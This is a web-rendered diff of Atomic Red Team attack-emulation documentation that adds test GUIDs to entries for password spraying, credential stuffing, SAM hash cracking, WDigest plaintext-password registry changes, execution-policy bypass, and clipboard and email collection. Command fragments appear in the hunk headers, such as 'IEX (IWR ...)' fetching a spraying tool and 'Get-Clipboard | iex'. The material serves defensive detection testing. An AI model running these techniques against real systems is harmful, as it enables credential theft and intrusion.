## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe
auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.
More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
**Supported Platforms:** Windows
**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
#### Inputs:
@@ -514,13 +540,15 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
<br/>
## Atomic Test #14 - whois file download
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
Download a remote file using the whois utility
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab
#### Inputs:
atomics/T1106/T1106.md
+5 -3
View File
@@ -16,13 +16,15 @@ Adversaries may abuse these native API functions as a means of executing behavio
<br/>
## Atomic Test #1 - Execution through API - CreateProcess
auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62
Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.
**Supported Platforms:** Windows
**auto_generated_guid:** 99be2089-c52d-4a4a-b5c3-261ee42c8b62
#### Inputs:
atomics/T1110.001/T1110.001.md
+10 -6
View File
@@ -33,13 +33,15 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
<br/>
## Atomic Test #1 - Brute Force Credentials of all domain users via SMB
auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224
Creates username and password files then attempts to brute force on remote host
**Supported Platforms:** Windows
**auto_generated_guid:** 09480053-2f98-4854-be6e-71ae5f672224
#### Inputs:
@@ -71,13 +73,15 @@ echo "Password!" >> #{input_file_passwords}
<br/>
## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos
**Supported Platforms:** Windows
**auto_generated_guid:** c2969434-672b-4ec8-8df0-bbb91f40e250
#### Inputs:
atomics/T1110.002/T1110.002.md
+5 -3
View File
@@ -10,13 +10,15 @@
<br/>
## Atomic Test #1 - Password Cracking with Hashcat
auto_generated_guid: 6d27df5d-69d4-4c91-bc33-5983ffe91692
Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
**Supported Platforms:** Windows
**auto_generated_guid:** 6d27df5d-69d4-4c91-bc33-5983ffe91692
#### Inputs:
atomics/T1110.003/T1110.003.md
+15 -9
View File
@@ -33,16 +33,18 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
<br/>
## Atomic Test #1 - Password Spray all Domain Users
auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175
CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
**Supported Platforms:** Windows
**auto_generated_guid:** 90bc2e54-6c84-47a5-9439-0a2a92b4b175
#### Inputs:
@@ -79,15 +81,17 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
<br/>
## Atomic Test #2 - Password Spray (DomainPasswordSpray)
auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
https://github.com/dafthack/DomainPasswordSpray
**Supported Platforms:** Windows
**auto_generated_guid:** 263ae743-515f-4786-ac7d-41ef3a0d4b2b
#### Inputs:
@@ -113,15 +117,17 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725
<br/>
## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
**Supported Platforms:** Windows
**auto_generated_guid:** f14d956a-5b6e-4a93-847f-0c415142f07d
#### Inputs:
atomics/T1110.004/T1110.004.md
+10 -6
View File
@@ -31,13 +31,15 @@ In addition to management services, adversaries may "target single sign-on (SSO)
<br/>
## Atomic Test #1 - SSH Credential Stuffing From Linux
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
Using username,password combination from a password dump to login over SSH.
**Supported Platforms:** Linux
**auto_generated_guid:** 4f08197a-2a8a-472d-9589-cd2895ef22ad
#### Inputs:
@@ -75,13 +77,15 @@ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | g
<br/>
## Atomic Test #2 - SSH Credential Stuffing From MacOS
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
Using username,password combination from a password dump to login over SSH.
**Supported Platforms:** macOS
**auto_generated_guid:** d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
#### Inputs:
atomics/T1112/T1112.md
+30 -18
View File
@@ -26,14 +26,16 @@ The Registry of a remote system may be modified to aid in execution of files as
<br/>
## Atomic Test #1 - Modify Registry of Current User Profile - cmd
auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** Windows
**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
@@ -57,15 +59,17 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
<br/>
## Atomic Test #2 - Modify Registry of Local Machine - cmd
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** Windows
**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe
#### Inputs:
@@ -94,15 +98,17 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
<br/>
## Atomic Test #3 - Modify registry to store logon credentials
auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
@@ -126,17 +132,19 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
<br/>
## Atomic Test #4 - Add domain to Trusted sites Zone
auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57
#### Inputs:
@@ -171,14 +179,16 @@ Remove-item $key -Recurse -ErrorAction Ignore
<br/>
## Atomic Test #5 - Javascript in registry
auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** Windows
**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae
@@ -202,14 +212,16 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
<br/>
## Atomic Test #6 - Change Powershell Execution Policy to Bypass
auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245
Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
They can either specify it during the execution of the powershell script or change the registry value for it.
**Supported Platforms:** Windows
**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245
#### Inputs:
atomics/T1113/T1113.md
+25 -15
View File
@@ -19,13 +19,15 @@
<br/>
## Atomic Test #1 - Screencapture
auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
**auto_generated_guid:** 0f47ceb1-720f-4275-96b8-21f0562217ac
#### Inputs:
@@ -54,13 +56,15 @@ rm #{output_file}
<br/>
## Atomic Test #2 - Screencapture (silent)
auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
**auto_generated_guid:** deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
#### Inputs:
@@ -89,13 +93,15 @@ rm #{output_file}
<br/>
## Atomic Test #3 - X Windows Capture
auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
Use xwd command to collect a full desktop screenshot and review file with xwud
**Supported Platforms:** Linux
**auto_generated_guid:** 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
#### Inputs:
@@ -139,13 +145,15 @@ sudo #{package_installer}
<br/>
## Atomic Test #4 - Capture Linux Desktop using Import Tool
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
Use import command from ImageMagick to collect a full desktop screenshot
**Supported Platforms:** Linux
**auto_generated_guid:** 9cd1cccb-91e4-4550-9139-e20a586fcea1
#### Inputs:
@@ -186,13 +194,15 @@ sudo apt-get -y install graphicsmagick-imagemagick-compat
<br/>
## Atomic Test #5 - Windows Screencapture
auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
**Supported Platforms:** Windows
**auto_generated_guid:** 3c898f62-626c-47d5-aad2-6de873d69153
#### Inputs:
atomics/T1114.001/T1114.001.md
+5 -3
View File
@@ -12,16 +12,18 @@ Outlook stores data locally in offline data files with an extension of .ost. Out
<br/>
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox
auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
Note: Outlook is required, but no email account necessary to produce artifacts.
**Supported Platforms:** Windows
**auto_generated_guid:** 3f1b5096-0139-4736-9b78-19bcb02bb1cb
#### Inputs:
atomics/T1115/T1115.md
+20 -12
View File
@@ -18,13 +18,15 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
<br/>
## Atomic Test #1 - Utilize Clipboard to store or execute commands from
auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7
@@ -50,13 +52,15 @@ del %temp%\T1115.txt >nul 2>&1
<br/>
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell
auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416
@@ -77,13 +81,15 @@ Get-Clipboard | iex
<br/>
## Atomic Test #3 - Execute commands from clipboard
auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
Echo a command to clipboard and execute it
**Supported Platforms:** macOS
**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
@@ -104,13 +110,15 @@ $(pbpaste)
<br/>
## Atomic Test #4 - Collect Clipboard Data via VBA
auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
**Supported Platforms:** Windows
**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
#### Inputs:
atomics/T1119/T1119.md
+20 -12
View File
@@ -18,14 +18,16 @@ This technique may incorporate use of other techniques such as [File and Directo
<br/>
## Atomic Test #1 - Automated Collection Command Prompt
auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** cb379146-53f1-43e0-b884-7ce2c635ff5b
@@ -51,14 +53,16 @@ del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
<br/>
## Atomic Test #2 - Automated Collection PowerShell
auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** 634bd9b9-dc83-4229-b19f-7f83ba9ad313
@@ -83,14 +87,16 @@ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | O
<br/>
## Atomic Test #3 - Recon information for export with PowerShell
auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** c3f6d794-50dd-482f-b640-0384fbb7db26
@@ -118,14 +124,16 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
<br/>
## Atomic Test #4 - Recon information for export with Command Prompt
auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** aa1180e2-f329-4e1e-8625-2472ec0bfaf3
atomics/T1120/T1120.md
+5 -3
View File
@@ -10,13 +10,15 @@
<br/>
## Atomic Test #1 - Win32_PnPEntity Hardware Inventory
auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5
Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity
**Supported Platforms:** Windows
**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5
atomics/T1123/T1123.md
+5 -3
View File
@@ -12,13 +12,15 @@ Malware or scripts may be used to interact with the devices through an available
<br/>
## Atomic Test #1 - using device audio capture commandlet
auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
**Supported Platforms:** Windows
**auto_generated_guid:** 9c3ad250-b185-4444-b5a9-d69218a10c95
atomics/T1124/T1124.md
+10 -6
View File
@@ -16,13 +16,15 @@ This information could be useful for performing other techniques, such as execut
<br/>
## Atomic Test #1 - System Time Discovery
auto_generated_guid: 20aba24b-e61f-4b26-b4ce-4784f763ca20
Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 20aba24b-e61f-4b26-b4ce-4784f763ca20
#### Inputs:
@@ -48,13 +50,15 @@ w32tm /tz
<br/>
## Atomic Test #2 - System Time Discovery - PowerShell
auto_generated_guid: 1d5711d6-655c-4a47-ae9c-6503c74fa877
Identify the system time via PowerShell. Upon execution, the system time will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 1d5711d6-655c-4a47-ae9c-6503c74fa877
atomics/T1127.001/T1127.001.md
+10 -6
View File
@@ -14,13 +14,15 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
<br/>
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#)
auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93
Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** 58742c0f-cb01-44cd-a60b-fb26e8871c93
#### Inputs:
@@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB)
auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359
Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** ab042179-c0c5-402f-9bc8-42741f5ce359
#### Inputs:

Some files were not shown because too many files have changed in this diff Show More